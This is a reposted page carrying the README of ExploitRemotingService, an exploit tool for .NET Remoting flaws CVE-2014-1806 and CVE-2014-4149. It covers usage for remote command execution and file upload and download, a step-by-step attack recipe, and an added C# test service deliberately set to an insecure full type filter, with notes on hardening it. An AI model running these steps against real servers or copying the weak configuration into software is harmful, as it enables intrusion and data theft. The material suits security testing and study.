.NET Remoting Service remote code execution vulnerability (exploit), collected and compiled by China Cold Dragon

Source: Internet
Author: User
Tags: hosting, cve

Source: https://github.com/tyranid/ExploitRemotingService
Exploit Database mirror: http://www.exploit-db.com/sploits/35280.zip

ExploitRemotingService (c) James Forshaw
=========================================

A tool to exploit .NET Remoting services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows, although some aspects _might_ work in Mono on *nix.

Usage instructions:
===================

ExploitRemotingService [options] uri command [command args]
Copyright (C) James Forshaw 2014

Uri:
The supported URIs are as follows:
tcp://host:port/objname  - TCP connection on host and port
ipc://channel/objname    - Named pipe channel

Options:
  -s, --secure               Enable secure mode
  -p, --port=VALUE           Specify the local TCP port to listen on
  -i, --ipc=VALUE            Specify listening pipe name for IPC channel
      --user=VALUE           Specify username for secure mode
      --pass=VALUE           Specify password for secure mode
      --ver=VALUE            Specify version number for remote, 2 or 4
      --usecom               Use DCOM backchannel instead of .NET remoting
      --remname=VALUE        Specify the remote object name to register
  -v, --verbose              Enable verbose debug output
      --useser               Uses old serialization tricks, only works on
                               full type filter services
  -h, -?, --help

Commands:
exec [-wait] program [cmdline]: Execute a process on the hosting server
cmd  cmdline                  : Execute a command line process and display stdout
put  localfile remotefile     : Upload a file to the hosting server
get  remotefile localfile     : Download a file from the hosting server
ls   remotedir                : List a remote directory
run  file [args]              : Upload and execute an assembly, calls entry point
user                          : Print the current username
ver                           : Print the OS version

This tool supports exploiting both TCP remoting services and local IPC services. To test the exploit you need to know the name of the .NET Remoting service and the port it is listening on (for TCP) or the name of the named pipe (for IPC). You can normally find this in the server or client code. Look for calls to:

RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance

You can then try the exploit by constructing an appropriate URL. For TCP use the URL format tcp://hostname:port/servicename. For IPC use ipc://namedpipename/servicename.

A simple test is to do:

ExploitRemotingService serviceurl ver

If successful it should print the OS version of the hosting .NET Remoting service. If you get an exception, the server might be patched for CVE-2014-1806. At this point try the COM version using:

ExploitRemotingService -usecom serviceurl ver

This works best locally, but it can also work remotely if you modify the COM configuration and disable the firewall. If that still doesn't work, then it is probably an up-to-date server.

Alternatively, you can try the full serialization version using:

ExploitRemotingService -useser serviceurl ls c:\

For this to work the remoting service must be running with full TypeFilter mode enabled (which some are, especially IPC services). It also only works with the commands ls, put and get, but that should be enough to compromise a box.

I've provided an example service to test against.
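To make the README's hints concrete, here is an added example (written for this page; it is not code from ExploitRemotingService, its README or its bundled example service) of a minimal .NET Remoting TCP service in C#. The class name SampleService, the object name "SampleService" and the port 9090 are assumptions. It shows the RegisterWellKnownServiceType call whose second argument becomes the objname in tcp://host:port/objname, the BinaryServerFormatterSinkProvider.TypeFilterLevel setting that the -useser path depends on (Full), and, in the non-weak branch, the settings that change the picture for an attacker: TypeFilterLevel.Low (this only closes the -useser path; defending against CVE-2014-1806 and CVE-2014-4149 themselves requires the vendor patches), secure=true (the channel then requires Windows authentication, which is what the tool's -s, --user and --pass options exist for) and rejectRemoteRequests=true (connections from other hosts are refused, so only a local ipc:// or tcp://localhost attacker remains).

```csharp
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Tcp;
using System.Runtime.Serialization.Formatters;

// Hypothetical remoted object. The name and port below are assumptions made
// for this example; they are not taken from the tool or its README.
public class SampleService : MarshalByRefObject
{
    public string Ping(string who) { return "pong: " + who; }
}

public static class SampleHost
{
    public const int Port = 9090;
    public const string ObjectName = "SampleService";

    // weak == true : TypeFilterLevel.Full, the "full type filter" state that
    //                the tool's -useser mode relies on; anyone who can reach
    //                the port talks to the service unauthenticated.
    // weak == false: TypeFilterLevel.Low (the framework default), channel
    //                security on, and remote connections rejected.
    public static void Start(bool weak)
    {
        var serverProv = new BinaryServerFormatterSinkProvider();
        serverProv.TypeFilterLevel = weak ? TypeFilterLevel.Full : TypeFilterLevel.Low;

        var props = new Hashtable();
        props["port"] = Port;
        // "secure" turns on Windows authentication (and signing/encryption)
        // for the channel; "rejectRemoteRequests" refuses non-local clients.
        props["secure"] = !weak;
        props["rejectRemoteRequests"] = !weak;

        var channel = new TcpChannel(props, null, serverProv);
        ChannelServices.RegisterChannel(channel, false);

        // This is the call the README tells you to grep for. Together with the
        // channel port it yields the exploit URL tcp://host:9090/SampleService.
        RemotingConfiguration.RegisterWellKnownServiceType(
            typeof(SampleService), ObjectName, WellKnownObjectMode.Singleton);
    }

    public static string Url(string host)
    {
        return "tcp://" + host + ":" + Port + "/" + ObjectName;
    }
}

public static class SampleClient
{
    // Client side: the same URL you would hand to ExploitRemotingService.
    // Look for Activator.GetObject / Activator.CreateInstance calls like this
    // in client code to recover the object name when the server is not at hand.
    public static string Call(string url, string who)
    {
        var proxy = (SampleService)Activator.GetObject(typeof(SampleService), url);
        return proxy.Ping(who);
    }
}

class Program
{
    static void Main(string[] args)
    {
        bool weak = args.Length > 0 && args[0] == "--weak";
        SampleHost.Start(weak);
        string url = SampleHost.Url("localhost");
        Console.WriteLine("listening on " + url + " (TypeFilterLevel="
            + (weak ? "Full" : "Low") + ", secure=" + !weak + ")");
        Console.WriteLine(SampleClient.Call(url, "self-test"));
        Console.WriteLine("press Enter to stop");
        Console.ReadLine();
    }
}
```

Compile it against .NET Framework with a reference to System.Runtime.Remoting.dll and run it with --weak to get a full-type-filter service to point the tool at (ExploitRemotingService tcp://localhost:9090/SampleService ver). Run it without the flag to see which of the README's paths stop working once the channel is authenticated and local-only.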


Download: http://pan.baidu.com/s/1s9BdW

